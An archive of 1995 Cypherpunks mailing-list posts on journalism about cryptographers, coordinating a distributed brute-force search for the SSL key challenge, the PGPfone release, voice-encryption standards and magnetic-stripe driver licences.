>of Bernstein to call me and tell me about the litigant's best qualities,
>I'd appreciate greatly hearing from again. He called when I'd pretty much
>passed deadline for manuscript delivery. I'm calling Dan again, but after
>one trip to Delphi, I dunno if the responses from the Oracle will be any
>more forthcoming.

We need to "Just say No!" to journalists asking for "more personal details"
to spice up their stories. No offense meant to Peter, who is apparently
just responding to editorial pressures, but this "personal journalism" is
getting tiresome. (Needless to say, "in my opinion." Your mileage may
vary.)

I no longer read the many puff pieces on Phil Zimmermann, for example, as
they all are seemingly in the same format: huge closeup photos of Phil's
face, crap about his peace activist days, personal anecdotes about his
battles with RSADSI, speculations about his possible indictment, etc. Utter
journalistic bullshit, Oprah style. I have expect Stone Philips to attach
an Estes rocket engine to Phil to give the story more pizazz.

Instead of good "science reporting," we get "personality pieces." Instead
of explanations of crypto, of PGP, of the many important (and complicated!)
issues involving identity, key signing, "nymity," digital money, and the
implications of crypto anarchy, we get "People" magazine.

"In the next issue, computer hackers reveal the secrets of their special diets."

Granted, many people prefer personality stories. Fits with short attention
spans, with only the most casual interest in the subject. If you've never
heard of a prime number before, all you can get out of a story is where Dan
Bernstein grew up and why he became a scientist.

On a personal note, I provided almost no personal details to Steven Levy,
for a book he's reported to be writing. I think he'll confirm this, if he's
still reading this list. When he did the "Wired" piece a couple of years
ago (cover story on "Crypto Rebels," issue #2, or "1.2"), the few personal
details which crept in about us were (at least in my case) nearly the only
such details provided.

I kidded (not kiddered) Levy about the focus on "personalities" in modern
books on high tech and science, and asked him not to do the same with me.
There were three books out at that time (late 1992) on "complexity" and/or
"artificial life": Levy's "Artificial Life," Mitchell Waldrop's
"Complexity," and one by Lewin (sp?), which I have someplace but can't find
right now. All were remarkably similar, with this as a typical personality
passage:

(opened at random)

"When Langton finally made it to the University of Arizona campus in Tucson
in the fall of 1976, he was able to hobble around with the aid of a cane,
although there were still more operations to come on his knee and right
shoulder..."

(Waldrop, p. 211)

And so on, ad nauseum. Chris Langton, a very fine fellow whom I met at the
first Artificial Life conference, back in 1987 (before it got so trendy, so
high tech chic), has been "profiled" in dozens of books, ad nauseum. Like
Zimmermann, his childhood and exploits with hang gliders have been told
over and over again, often substituting for solid explanations of the
important ideas.

I haven't seen Cassidy's story, of course, nor have I seen Levy's book
(forthcoming, I think), so perhaps they have moved away from the
personality profile approach. Editors may demand more personality stuff,
but we should just say No. (Or not get interviewed, which is fine. I've
turned down three interviews in the last year, mostly because I couldn't
say what would be gained. Too many damned magazines anyway! What's the
point of being the "freak of the week"--to use Dave Mandl's term--in some
obscure issue of "Access" or "Spin" or "Raygun," when the issues are just
skimmed by the Generation Xers to whom they are targetted?

A wonderful, wonderful book which--I think--set the stage for modern
personality profile journalism, at least in high tech, was Tracy Kidder's
"The Soul of a New Machine." It came out in 1981 and was a best-seller and
award-winner, recounting in great detail the development of the Data
General answer to the VAX. Wonderful stuff about "shootouts at HoJos,"
about how "if you succeed you get to do it again," and how "Wests hire
Wests." The personal stuff was fascinating, and lent an air of a group
biography to the book. Highly recommended.

I think this has become one of the main models for modern high tech
journalists to emulate. However, few have the flair that Kidder had (Levy
does, in my opinion), and many misapply the Kidder model to stories that
basically don't have the drama that the Kidder story did. For example,
artificial life is interesting stuff, but it's hard to get any high stakes
drama out of it, except by "manufacturing drama" (to borrow from Chomsky).

John Markoff, another writer whom I respect a great deal, is doing a
screenplay (or story treatment, so I have heard) about the Mitnick affair.
Lots of Hollywood stuff is already there: Shimomura, Mitnick, high tech war
rooms tracking Mitnick's movements, a raid by the authorities, even a
Nevada hooker who has it in for Shimomura (read the personality piece by
Katie Hafner, Markoff's wife (I think), in a recent issue of "Esquire"). If
he hits the big time, even more so than he's already hit, I expect even
more journalists and writers will be sniffing around. "Cypherpunks--The
Movie"?

The modern crypto issue has some real drama, of course, but I'm not sure I
want to read several pages on Dorothy Denning's childhood, or why Stu Baker
had to miss Woodstock. I hope Levy is not just Kiddering.

Anyway, enough of my rant on journalism today. I mean no offense to
journalists, who are probably just doing their job. But publicity can be
seductive, and sometimes it's better to just take a Zen approach of
avoiding the empty furor.

--Tim May, who lives in "Digital Walden," 90 miles south of San Francisco,
and who thus finds it easy to turn down requests for interviews in SF.



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 04:08:11 PDT
To: CYPHERPUNKS@toad.com
Subject: Thanks for all your efforts ... you can stop now ...
Message-ID: <"swan.cl.cam.:131320:950826110802"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


The actualy attempt is now over. See http://www.brute.cam.ac.uk/brute/
(which is being updated from time to time). Thanks for your patience.
Could people running old versions please kill any looping clients.

Anyone wanting to try to sort out any remaining problems (NB: the load has
dropped, so only the "hard faults" will remain) should contact me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 04:09:19 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: SSL CHALLENGE: I told you so....
In-Reply-To: <8AFD417.000300036F.uuout@famend.com>
Message-ID: <"swan.cl.cam.:131630:950826110839"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>   Geez. It would be better not to even have a damned keyserver at all,
> but to just have everybody pick a random start location, than to do it
> this way.

Define "better" ...

See my earlier post on what this poroject was about ...
(1) and (2) -- (3) is later 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Sat, 26 Aug 95 03:34:18 PDT
To: cypherpunks@toad.com
Subject: SSL trouble
Message-ID: <9508261034.AA15406@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


Let us call "sequential search" an algorithm that remembers which keys were
tried and avoids trying them again, and "random search" an algorithm that
just tries keys at random without bothering to check.
 
The sequential search has the following problems:
 
1. The server is badly overloaded.
It is vulnerable to a variety of active attacks:
2. "result hoarding" attacks: finding the result and reporting it "not found".
3. "dilution" attack: allocating some search space and not sweeping it.
4. plain old "denial of service" attack: deliberately overloading the server
   with bogus communications.
5. And of course all of the above in their "buggy software or hardware"
   versions.
 
The random search has none of them:
attacks 1 and 4: there is no server to overload
attacks 2 and 3 are no worse than simply refusing to participate in the search,
because the rest of the computation is independent of what any one party is
doing.
 
The main drawback of the random search is that the expected running "time" is
the size of the key space instead of half the size for the sequential search
("time" here is the number of keys to try before finding the right one).
 
In practice, because of server overload, our machines don't seem to be working
more than half the time, so the random search could be actually faster than
the sequential search.  Even if it isn't, I think doing twice as much work
is a good trade-off for protection against all attacks, and no more network
or server problems, and no more allocation hassles for off-line users.
 
Four more remarks:
* I get the factor of two by assuming that the algorithm is "pick a segment at
  random, look for the key in it, pick a new segment at random, and so on".
  I suspect that sequential searching from a random starting point would be
  much worse in the case of many independent searchers.
* I hope there's no bug in my math.
* Another drawback is that the worst-case running time is infinite (but it is
  infinitely unlikely).
* Of course, we need a good PRNG, but that's essentially what RC4 is.

In conclusion, I think random searching is the way to go.  It's even better
than Monty's pre-allocation with quad-coverage.
 
-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Sat, 26 Aug 95 10:10:32 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Thanks for all your efforts ... you can stop now ...
In-Reply-To: <"swan.cl.cam.:131320:950826110802"@cl.cam.ac.uk>
Message-ID: <Pine.SUN.3.91.950826130755.29279A-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Piete Brooks wrote:

> The actualy attempt is now over. See http://www.brute.cam.ac.uk/brute/
> (which is being updated from time to time). Thanks for your patience.
> Could people running old versions please kill any looping clients.

Thanks to Piete and the rest of the brute crew for getting this 
experiment together!

I hope this will not be the end of our distributed brute-forcing runs, 
but only the beginning!  We should be able to take what we have learned 
from this run and put together an even smoother run for the next challenge.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 10:59:28 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <9508261758.AA25920@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



There are more effective solutions than simple random search, these have been 
known in the distributed processing arena for years.

What you effectivelly have is a farmed solution to a problem with a high degree 
of trivial parallelism. Farms always suffer from the server bottleneck problem. 
The alternative is to use a multifarm, its a bit complicated to explain bu the 
essence is that you distribute the farmming mechanism. The most extreeme example 
of this is to have every slave also act as a master for some part of the problem. 
Since the bandwidth/processing ratio is unfavourable it would be better to have a 
small but non trivial (5-10) number of master controllers.


The basic principles are to leverage pipelined parallelism, a slave does not 
simply ask for a chunk of keyspace, process it, return results and ask for the 
next chunk. Instead overlap work packages, give them more than one to work at at 
once so that the system does not suspend waiting on the server.

Size the chunks adaptively, the more keyspace a processor works through the more 
packets it is given at once.

Use integrity checks to ensure that the slaves are acting properly. One method of 
doing this is to keep secret part of the known plaintext (say 16 bits). A slave 
is required to report _all_ matches in the range to the master. Slaves who report 
a statistically low number of matches may be considered suspicious. It is a 
simple matter to allocate part of that keyspace to another processor for a 
double-check.

	[Its so obvious I'll apply for a patent on that technique]

Another usefull technique is to require the slave to checksum some collateral 
result from the calculation mix. Then if its simply braindead software it can be 
detected.

When running a multi-master farm it is important to realise that the slaves serve 
all the masters, not just a single one. Masters can distribute work chunks 
amongst themselves in larger chunks, as chunks are completed this is communicated 
to the other workers.

If we used the Web as a substrate for this work the control software could then 
be used for other related tasks requiring large scale parallel processing on 
networked workstations.  This was one of the original applications I looked at 
back in 1992 when I was doing an awful lot of this type of work.


		Phill Hallam-Baker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 26 Aug 95 14:29:54 PDT
To: cypherpunks@toad.com
Subject: PGPfone 1.0b4 Test at Party Tonight
Message-ID: <ac64b983000210044ade@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Talk about synchronicity!

Three years ago, as we met for our first meeting (before we had been dubbed
"Cypherpunks"), PGP 2.0 had just appeared a day or two earlier. Arthur
Abraham prepared copies on floppies (I know, I know, not fully secure :-}),
and we all got copies at that first meeting.

Well, PGPfone was released yesterday, and the release date is officially 25
August. And I have it, and my Cypherpunks Santa Cruz party/meeting is
tonight.

It runs on Macintoshes, so far, and I got it downloaded (from
"alt.anonymous.messages," ironically, as the MIT site would not let me have
it, claiming they couldn't verify that "got.net" was a kosher site....so,
"the street" gave it to me, without any of those messy restrictions on who
I can give it to, etc.:-}). Quit an example of synchronicity, that it just
appeared, that the Mac is its first implementation platform, and that
today's my party.

It seems to work, at least in voice mode, though I need to read up on
set-ups for my sound input and output (fairly standard for the Mac, but
always a chance of some misconfiguration). I have a PowerMac 7100av, goosed
up to 84 MHz, so power should not be a problem.

What would really be nice is to have someone to test this with. Hence this
message. If you are willing to be a test partner, especially at tonight's
Cypherpunks Santa Cruz party, send me a message with your phone number. And
any tips you've found are necessary to make it work.

(I already realized I had to get the latest Threads Manager, and did so via
Apple's Web site.)

The party starts around 6 p.m., PDT. A call around 8-10 p.m. PDT would be
nice. I can call you, or vice versa, depending.

Three cheers for synchronicity!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Sat, 26 Aug 95 06:05:14 PDT
To: rsnyder@janet.advsys.com (Bob Snyder)
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <199508261129.HAA22154@janet.advsys.com>
Message-ID: <m0smKvJ-000PZgC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 12:26:09 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: PGP and AIX
Message-ID: <Pine.SOL.3.91.950826152246.28507L-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Has anyone sucessfully compiled PGP with AIX v.4 on an IBM RS6000?

If so, please mail me, as I'm trying to install it sucessfully.

Thanks!
Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMD90vL5ALmeTVXAJAQFY/wL/eMTW42xlF7BGJ8btfb4VCHvZcRFkTTZa
vTAiCRRdlXsKsdLRtxmE+Bf2aRVsiXg1xQ3YVQNewcX42PLET+GGqmIo6u2jXuCn
bfslubIHAr9InfPMV+/tOvGhgAWP3nTr
=8qXL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 26 Aug 95 15:28:16 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: Modern Journalism (was: All about Bernstein)
In-Reply-To: <199508262121.RAA24748@zork.tiac.net>
Message-ID: <Pine.SUN.3.91.950826151407.6069A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 26 Aug 1995, steven ryan wrote:

> You may not want to read those stories any more because you know all the
> details. But a puffed up cover story on Phil Z in People magazine would be
> one of the best things that could happen. . . .

I concur with Steven, but only so long as the piece is more or
less sympathetic.  I think Phil has gotten an amazing amount of
positive press.  In the scheme of things, this may prove to be 
more beneficial for the Cypherpunkish agendas than even his 
creation of PGP.  Phil's image--cryptographer as puppy-dog--will 
help us a lot more than the "evil kiddieporn/terrorist/hacker" 
image the FBI and Diane Feinstein would prefer the public to see.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Sat, 26 Aug 95 16:30:34 PDT
Subject: Re: Article in Time Magazine
In-Reply-To: <9508250941.AA00683@elysion.iaks.ira.uka.de>
Message-ID: <41nhbe$2jb@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


danisch@ira.uka.de (Hadmut Danisch) wrote:


>> All the more reason to use Linux or FreeBSD - an OS you have the source for,
>> on hardware that you can examine.


>How would you want to examine a pentium processor?

>Just an idea:

>Take the block move instructions and attach a little state machine.
>If a certain sequence of bytes is detected, a fuse somewhere on the chip
>is burned and the processor could switch irreversible into a mode where
>it does partial incorrect calculations. Send someone an email, an IP packet
>or an ethernet packet and you can expect the packet to be moved by a
>block move command. 


>Hadmut
> 

Err, ummm -- what I meant is that _you_ are the one that purchases,
installs, and decides on the processor, moterhbooard, RAM and accessories
(like a PCI video card, SCSI controller, etc).   If you want to go all the
way to the microcode on the chip, then that's another thing altogether.  I
was mentioning microcode in the IBM way, being the thing you load on the IPL
startup disk for a naked machine, not the embedded circuitry.  

Short of having a degree in Electronics Engineering, along with a scanning
electron microscope (for viewing the chip masks) and a whole lot of
experience with the chip in question, you are stuck with a trust of the chip
manufacturer.  No disagreement there.  But, should there be a malicious
"bug" in a chip, expecially in the PC world, it would show up sooner or
later (as shown by the Pentium FP error).  ALl the more reason to NOT be the
first one on the block to upgrade (I still have Xenix on a 286 for my kid,
Linux up on my old 386DX40, and my 486(NT) is just fine.  I only recently
aquired my first Pentium now that they are cheap enough for a P5-90).

Regards

Buzz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 14:22:25 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508262118.RAA15661@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> Use integrity checks to ensure that the slaves are acting
> properly. One method of doing this is to keep secret part of
> the known plaintext (say 16 bits). A slave is required to
> report _all_ matches in the range to the master. Slaves who
> report a statistically low number of matches may be considered
> suspicious. It is a simple matter to allocate part of that
> keyspace to another processor for a double-check.

  Please don't do anything like this.  This will prevent people
like me who prefer the "random" method from participating.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sat, 26 Aug 95 14:22:12 PDT
To: cypherpunks@toad.com
Subject: Re: Modern Journalism (was: All about Bernstein)
Message-ID: <199508262121.RAA24748@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I want to puhhff you up  -- SNL?

>We need to "Just say No!" to journalists asking for "more personal details"
>to spice up their stories... 
>I no longer read the many puff pieces on Phil Zimmermann, for example, as
>they all are seemingly in the same format: huge closeup photos of Phil's...

You may not want to read those stories any more because you know all the
details. But a puffed up cover story on Phil Z in People magazine would be
one of the best things that could happen. Some actresses feel that any
publicity is better than no publicity and they may be right. Given that we
are not going to get many in depth technical articles in the mainstream
press, puff pieces are better than nothing.

In the last month on two different occasions I have been in casual
conversations at work when the subject of PGP and cryptography came up based
on articles in the local media. I was able to answer the questions and
explain in detail the benefits of PGP and as well give out a disk loaded
with the program for them to try. If the puff pieces weren't read by these
people the subject would not have come up and I wouldn't have been likely to
have had the opportunity to get these people interested in using PGP.

Given that the average person still knows nothing of cypherpunk technology
and issues and probably wouldn't mind if it was all outlawed in the name of
national security, anything that keeps the topic in the public's eye is good.
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 09:40:40 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <"swan.cl.cam.:234280:950826164020"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 1. The server is badly overloaded.

Let's not get implementations confused with algorithms ...
We were using ALPHA code when we started ....

With BETA clients, a hierarchy and select/poll loops, I reckon a server would 
stand a chance.

> It is vulnerable to a variety of active attacks:
> 2. "result hoarding" attacks: finding the result and reporting it "not found".

Sure.

> 3. "dilution" attack: allocating some search space and not sweeping it.

Un ACKed space is re-allocated after the first scan has completed.

> 4. plain old "denial of service" attack: deliberately overloading the server
>    with bogus communications.

Few systems can resist such an attack !

> 5. And of course all of the above in their "buggy software or hardware"
>    versions.

... causing them ... yes -- especially (1) !!

> The random search has none of them:
> attacks 1 and 4: there is no server to overload

(4) is still applicable isn't it ?
What tells people to stop, or do they go on for ever ?

> attacks 2 and 3 are no worse than simply refusing to participate in the
> search, because the rest of the computation is independent of what any one
> party is doing.

(3) is just the same for the server -- it re-allocates.
(4) would require a restart :-(

> The main drawback of the random search is that the expected running "time" is
> the size of the key space instead of half the size for the sequential search
> ("time" here is the number of keys to try before finding the right one).

where "expected" is some loose average .....

My stats is *very* rusty, but I'd have thought it would be somewhat less than 
twice a linear search ...
However, I agree that as a ballpark figure, yes: it would be somewhere between 
N/2 and N ...

> In practice, because of server overload, our machines don't seem to be working
> more than half the time, so the random search could be actually faster than
> the sequential search.

IMPLEMENTATION !

> Even if it isn't, I think doing twice as much work
> is a good trade-off for protection against all attacks, and no more network
> or server problems, and no more allocation hassles for off-line users.

random probing does indeed have its merits.

Personally I'd go for a scheme whereby on finishing a random search, the 
client multicast a PGP signed message (there would be a WWW/email/telnet/... 
interface which would multicast for our non-connected members) allowing 
interested parties
1) to gather stats as to what actually happened
2) maps of "unsearched" areas to be built by anyone wanting to fill gaps
3) the "big boys" could learn to trust each other and use (2).
4) when all notified keys are tried, go in to killer mode, and try to find
   who is untrustworthy.  Someone can only try it once, and getting a "big boy"
   tag takes a while, and a lot of CPU cycles !

>  I suspect that sequential searching from a random starting point would be
>   much worse in the case of many independent searchers.

Convince me (please) ....

What size "chunks" should be scanned ?

> * Another drawback is that the worst-case running time is infinite (but it is
>   infinitely unlikely).

See above ... the big boys will do it eventually ...

> In conclusion, I think random searching is the way to go.

It has its advantages -- yes. Did you use it for Hal1 ?  :-))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 26 Aug 95 10:03:49 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
Message-ID: <199508261703.AA29706@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bob Snyder sez:
[..]
: > likely to be all over the (non-US-and-Canada) place before the 
: > weekend is over. 

: But if people get it from MIT directly, then MIT is violating ITAR/DTR, and 
: its lawyers would be justified in shutting things down.  If it's pulled down 
: by a US citizen, and then sent out, I don't see how MIT could be held 
: responsible for it.

It's already posted to alt.anonymous.messages, alt.fan.david-sternlight
and alt.binaries.warez.mac .

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 26 Aug 95 16:31:07 PDT
To: cypherpunks@toad.com
Subject: proliferation of voicesystems
Message-ID: <199508262330.TAA08738@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  It's really great that there are all these voice transmission/encryption
programs out there, the problem is, none of them will talk to each other.
If I have a unix box, I have to use product X, if I have a PC, product Y,
and a Mac, product Z, and X,Y, and Z all speak different protocols. The
issue is more frustrating with web clients. I like to use Netscape, but
if I want to view RealAudio, I have to switch to Windows, etc. Rather 
than have one "successful" product set a defacto standard and lock the 
rest of the market into one algorithm, cypherpunks who are working on
voice products should collaborate to product an open standard, which
specifies base level functionality, and drop in algorithm improvements.
Perhaps even video should be considered as that too will eventually be
a reality. Sooner or later, there must be a shakeout and a 
"standard" (defacto) will emerge. The question is, do you want this to be
an extensible open standard that can cope with changing hardware and
network capability, or do you want, say, InternetPhone, to win
and set the standard by shear market share like Netscape is doing 
now and like Microsoft has been doing?

Just something to consider.

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 16:36:41 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508262332.TAA26817@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


>>   Please don't do anything like this.  This will prevent
>> people like me who prefer the "random" method from
>> participating.

> You can't use the random method if the CRACK is using a
> sequential search. It just doesn't fit!

  Hehe...  I've always been a bit of a misfit.

> You can't ACK something which has not been allocated to you.

  But I could announce it on the list.

> However, if a CRACK were to be using random, the above would
> be useful as a "progress report" as the rate of reports
> indicates how well the search is going.

  I don't want to make progress reports.

> It would also allow more equal sharing out of the prize money,
> as on average 2**15 "possible" keys would be found, and the
> first finder of each would receive a fraction of the prize.

  Well, if someone starts talking real money, I might change my
tune.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 19:16:35 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508270132.VAA05017@interport.net>
MIME-Version: 1.0
Content-Type: text/plain




>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be
>> considered suspicious. It is a simple matter to allocate part
>> of that keyspace to another processor for a double-check.

>   Please don't do anything like this.  This will prevent
> people like me who prefer the "random" method from
> participating.

> Not true, it would be open for anybody to sweep a random space
> and report the results.

  I don't get it.  If the challenge is partly secret, how will I
know if I crack the code?

> The only difference would be that the sweeper who discovered
> the real key would not be the first to know of a break

  ?  Sorry, the terminology seems to be over my head here.

> and that it would not be possible to attack the crack through
> dishonestly claiming to have swept space that hadn't been.

  That is one reason I like the random method.

> You can't ACK something which has not been allocated to you.

>>  But I could announce it on the list.

  A clarification: my "it" above refers to a successful cracking
of the code.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 17:12:37 PDT
To: Will French <cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <199508262118.RAA15661@interport.net>
Message-ID: <9508270011.AA25215@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be considered
>> suspicious. It is a simple matter to allocate part of that
>> keyspace to another processor for a double-check.

>  Please don't do anything like this.  This will prevent people
>like me who prefer the "random" method from participating.

Not true, it would be open for anybody to sweep a random space and report the 
results. The only difference would be that the sweeper who discovered the real 
key would not be the first to know of a break and that it would not be possible 
to attack the crack through dishonestly claiming to have swept space that hadn't 
been.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@whip.ugcs.caltech.edu ((me))
Date: Sat, 26 Aug 95 13:57:32 PDT
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: Florida Drivers Permits
In-Reply-To: <Pine.BSI.3.91.950826000630.348B-100000@usr4.primenet.com>
Message-ID: <41o1rg$hg9@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Censored Girls Anonymous <carolab@censored.org> writes:

>On Sat, 26 Aug 1995, Robert A. Rosenberg wrote:

>Minnesota has now been doing this for over a year. There's been a lot of 
>trouble with it, but they have them. Mine is do any day, and it will
>certainly come in contact with a magnet, upon my possession.
California has both the digitized picture and the mag stripe, and they 
even get a digital copy of your thumbprint.
Hello, Brave New World.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 26 Aug 95 21:26:15 PDT
To: CYPHERPUNKS@toad.com
Subject: SSL trouble
Message-ID: <8AFE51A.0003000395.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DD> In conclusion, I think random searching is the way to go.  It's even better
DD> than Monty's pre-allocation with quad-coverage.

  Here's a thought: How about the best of both worlds. Keep the
double-coverage, bidirectional sweep, and allocate only one "team". The
client software will take the pre-allocated segment, and then go random
for the rest of the run.


 * GHOTI = FISH?
touGH: GH = F
wOmen: O = I
dicTIonary: TI=SH.
I love English!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Q Mixmaster Remailer <q@c2.org>
Date: Sat, 26 Aug 95 22:57:39 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508270513.WAA26795@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


silly@whip.ugcs.caltech.edu ((me)) wrote:

> California has both the digitized picture and the mag stripe, and
> they even get a digital copy of your thumbprint.  Hello, Brave New
> World.

I wonder what, if anything, you could be charged with if that
magnetic strip "accidentally" came too close to a degausser?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 19:35:03 PDT
To: cypherpunks@toad.com
Subject: Re: proliferations of voicesystems
Message-ID: <199508270234.WAA07065@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


I'd have to agree with you (Ray) completely about the need for
standards for the voice internet communications software.  I 
think it would be best to draw up a standard and disseminate
it rather than wait for one to emerge out of a product.  If 
a standard is designed, it could be designed with portability
and extensions in mind, whereas if something like InternetPhone
became a de-facto standard, it would probably be more 
difficult to add upon and port to alternate platforms.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 26 Aug 95 14:58:08 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508262118.RAA15661@interport.net>
Message-ID: <"swan.cl.cam.:029190:950826215747"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> Use integrity checks to ensure that the slaves are acting
>> properly. One method of doing this is to keep secret part of
>> the known plaintext (say 16 bits). A slave is required to
